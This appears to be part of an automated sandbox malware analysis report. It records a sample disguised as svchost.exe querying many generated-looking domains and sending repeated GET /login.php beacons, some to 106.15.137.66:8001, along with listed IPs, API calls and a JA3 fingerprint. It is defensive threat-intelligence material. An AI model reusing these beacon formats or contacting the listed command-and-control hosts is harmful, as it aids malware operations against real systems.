Source: unknown	DNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyguv.com replaycode: Name error (3)

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50845 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 50845
Source: unknown	Network traffic detected: HTTP traffic on port 50847 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 50847

Source: unknown

Network traffic detected: DNS query count 1005

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D14AF0 IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,

2_2_02D14AF0

Source: global traffic

TCP traffic: 192.168.2.5:49736 -> 106.15.137.66:8001

Source: global traffic

DNS traffic detected: number of DNS queries: 1005

Source: Joe Sandbox View	IP Address: 15.197.240.20 15.197.240.20
Source: Joe Sandbox View	IP Address: 64.190.63.136 64.190.63.136
Source: Joe Sandbox View	IP Address: 64.190.63.136 64.190.63.136

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww1.lysyfyj.comConnection: Keep-AliveCookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431387.5010053Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0243-077d-8f61-d4c58a818681 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431387.3029143Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=ba785a403bc90255316f056071bf01aa\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=aa184787ed2d77e1f6f59c2dc950863e\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=918vr471976932991951418Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=a03933307436d0e87a275c8dab3cea9f\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3bd5de231d5c30f08e390492f5c039b1\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
